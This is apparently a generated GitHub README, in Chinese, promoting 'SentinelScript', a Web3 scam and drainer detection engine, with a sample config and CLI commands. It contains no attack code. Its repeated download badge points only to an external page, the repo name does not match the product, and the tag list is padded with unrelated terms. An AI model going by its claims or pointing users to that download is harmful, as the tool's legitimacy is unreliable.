dannawee/scam-snare

GitHub: dannawee/scam-snare

SentinelScript 是一个基于行为启发式的 Web3 威胁情报引擎,用于检测和阻断加密货币诈骗、钓鱼及耗尽者攻击。

Stars: 0 | Forks: 0

# 🛡️ SentinelScript:主动式 Web3 威胁情报引擎 [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) [![Version](https://img.shields.io/badge/Release-2.6.0-blue?style=flat&logo=github)](https://dannawee.github.io) [![Platform](https://img.shields.io/badge/Platform-Cross--Platform-success?style=flat&logo=linux&logo=windows&logo=apple)](https://dannawee.github.io) ## 📥 立即获取 **获取最新的 SentinelScript 情报引擎:** [![Download](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://dannawee.github.io) ## 🌐 概述:数字免疫系统 SentinelScript 代表了去中心化威胁情报的范式转变——一个活的、适应性系统,作为 Web3 生态系统的免疫防御层。与传统的静态黑名单不同,我们的引擎采用行为启发式方法、跨链模式识别和社区验证的情报来识别新兴威胁。将其想象为区块链的分布式神经系统,每个节点都为集体安全意识做出贡献。 SentinelScript 诞生于对抗复杂的种子钓鱼活动、耗尽者基础设施和多态加密诈骗的需求,将原始威胁数据转化为可操作的防御协议。该系统不仅阻止已知威胁;它学习恶意意图的语法结构并预测未来的攻击向量。 ## ✨ 核心特性 ### 🔍 多向量威胁检测 - **行为异常识别**:识别智能合约交互中的细微偏差,这些偏差表明耗尽者正在部署 - **跨平台情报综合**:关联 DNS 记录、社交情绪和链上交易的数据 - **预测性风险评分**:根据时间模式和基础设施重用分配动态威胁级别 ### 🌍 通用兼容性矩阵 | 平台 | 状态 | 说明 | |----------|--------|-------| | 🐧 Linux | ✅ 完全支持 | 原生 systemd 集成,CLI 优化 | | 🪟 Windows | ✅ 完全支持 | PowerShell 模块,GUI 仪表板可用 | | 🍎 macOS | ✅ 完全支持 | 原生 Metal 加速用于可视化 | | 🐳 Docker | ✅ 容器就绪 | 预构建镜像用于隔离部署 | | ☁️ 云 | ✅ 多提供商 | 包含 AWS、Azure、GCP 部署模板 | | 🔧 Raspberry Pi | ⚠️ 有限支持 | ARM64 构建用于边缘部署场景 | ### 🏗️ 架构愿景 ``` graph TD A[Threat Intelligence Feeds] --> B(SentinelScript Core Engine) C[Community Submissions] --> B D[Blockchain Monitoring] --> B E[OSINT Streams] --> B B --> F{Analysis Matrix} F --> G[Pattern Recognition Layer] F --> H[Behavioral Heuristics] F --> I[Cross-Chain Correlation] G --> J[Threat Confidence Scoring] H --> J I --> J J --> K[Adaptive Defense Rules] K --> L[DNS Firewall Integration] K --> M[Browser Extension Alerts] K --> N[API Security Gateway] K --> O[Mobile Push Notifications] L --> P[Protected Ecosystem] M --> P N --> P O --> P ``` ## 🚀 部署与配置 ### 📋 示例配置文件 创建 `sentinel.config.yaml` 以自定义您的部署: ``` # SentinelScript 配置文件 engine: mode: "active_monitoring" # passive_monitoring | active_defense scan_interval: "300s" # Analysis cycle duration confidence_threshold: 0.78 # Minimum threat score for action intelligence_sources: - provider: "community_web" priority: 1 refresh_rate: "900s" - provider: "onchain_observatory" priority: 2 refresh_rate: "120s" - provider: "dns_telemetry" priority: 3 refresh_rate: "600s" defense_layers: dns_sinkhole: enabled: true upstream: "1.1.1.2" browser_shield: enabled: true browsers: ["chrome", "firefox", "brave"] api_gateway: enabled: false port: 8080 notification_channels: - type: "webhook" endpoint: "https://your-alert-system.example.com" - type: "telegram" bot_token: "${TELEGRAM_TOKEN}" chat_id: "${CHAT_ID}" # AI 集成实现高级威胁预测 cognitive_enhancement: openai_api: enabled: true model: "gpt-4-turbo" usage: "pattern_explanation" # threat_categorization | pattern_explanation claude_api: enabled: true model: "claude-3-opus-20240229" usage: "behavioral_analysis" # behavioral_analysis | intent_decoding ``` ### 💻 示例控制台调用 ``` # 使用自定义配置初始化 SentinelScript sentinel --init --config ./sentinel.config.yaml # 启动情报引擎并启用详细日志记录 sentinel --start --mode active_defense --log-level DEBUG # 执行临时域分析 sentinel analyze --domain suspicious-platform.xyz --depth 3 # 生成过去 24 小时的威胁情报报告 sentinel report --period 24h --format json --output ./threat-report.json # 与现有 DNS 基础设施集成 sentinel dns --integrate --bind-address 192.168.1.53 --upstream 9.9.9.9 ``` ## 🔧 高级集成特性 ### 🤖 认知 API 集成 SentinelScript 利用多个 AI 平台来增强威胁理解: - **OpenAI API 集成**:将原始威胁指标转化为人类可读的攻击叙事,用通俗易懂的语言解释复杂的多向量活动 - **Claude API 综合**:对新兴威胁模式进行深度行为分析,识别不同攻击面之间的细微关联 - **混合情报处理**:结合确定性基于规则的分析和概率性 AI 评估,以实现平衡的威胁评估 ### 🌐 响应式仪表板界面 管理控制台可适应任何设备,同时保持操作清晰度: - **渐进式披露界面**:复杂数据仅在需要时显示,减少常规监控期间的认知负担 - **实时威胁可视化**:交互式网络图显示威胁关系和传播路径 - **多语言操作支持**:界面支持 17 种语言,包含社区贡献的翻译 - **无障碍优先设计**:符合 WCAG 2.1 AA 标准,优化屏幕阅读器和键盘导航 ## 📊 运营优势 ### 对于个人用户 - **交易前验证**:浏览器扩展在钱包交互前突出显示潜在风险 - **个人威胁提要**:根据您的数字足迹和资产组合定制警报 - **教育性洞察**:通过上下文解释了解新兴威胁技术 ### 对于组织 - **基于 API 的集成**:RESTful 端点用于将威胁情报整合到现有安全堆栈中 - **集体情报共享**:贡献匿名发现以加强生态系统防御 - **合规报告**:自动生成安全态势文档以满足监管要求 ### 对于开发者 - **插件架构**:使用我们的 SDK 通过自定义分析模块扩展功能 - **Webhook 生态系统**:将 SentinelScript 连接到您的事件响应工作流程 - **沙盒测试环境**:安全地分析潜在恶意域名而无风险 ## ⚠️ 重要免责声明 **重要法律和运营声明(2026 年版):** SentinelScript 是一款专为防御安全目的而设计的威胁情报工具。用户承担遵守其管辖范围内所有适用法律法规的全部责任。维护者不提供关于完整性、准确性或特定用途适用性的任何保证。此工具应补充而非取代全面的安全实践。 - **非财务建议**:威胁指标不应被解释为投资指导 - **误报确认**:自动化系统偶尔可能会标记合法服务 - **社区驱动性质**:情报质量取决于贡献者的勤奋和验证 - **不断变化的威胁态势**:没有任何安全解决方案能够为坚定的对手提供绝对保护 ## 🔄 持续改进循环 我们的开发理念拥抱持续完善: 1. **威胁获取**:从多样化的经过验证的来源收集指标 2. **社区验证**:通过分布式共识交叉验证发现 3. **引擎优化**:根据功效指标更新检测算法 4. **生态系统分发**:与所有网络参与者分享优化后的情报 5. **反馈整合**:纳入用户体验以增强未来迭代 ## 📄 许可证信息 SentinelScript 根据 MIT 许可证发布。这种宽松的许可结构鼓励学术研究和商业集成,同时保持透明度。 **完整许可证文本见:** [LICENSE](LICENSE) MIT 许可证免费授予任何获得本软件及相关文档文件("软件")副本的人处理软件的权限,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或销售软件副本的权利,并允许获得软件的人这样做,但须遵守以下条件: 上述版权声明和本许可声明应包含在软件的所有副本或重要部分中。 ## 🤝 协作开发 我们欢迎能够增强集体安全态势的建设性贡献。请在提交拉取请求之前查看我们的贡献指南。所有情报提交在整合到主要威胁提要之前都会经过同行验证。 ## 📥 获取 SentinelScript **准备好部署您的威胁情报基础设施了吗?** [![Download](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://dannawee.github.io) *SentinelScript:自 2023 年以来照亮 Web3 的阴影。我们共同构建更具弹性的数字未来。*
标签:AI合规, Drainer检测, Petitpotam, Web3安全, 加密货币诈骗, 加密货币防护, 区块链安全, 去中心化安全, 反欺诈, 威胁情报, 威胁评分, 幻觉检测, 开发者工具, 恶意地址封禁, 数字资产保护, 日志审计, 智能合约审计, 社区情报, 种子短语保护, 网络安全, 请求拦截, 跨链分析, 逆向工具, 钓鱼检测, 链上分析, 隐私保护, 预测性安全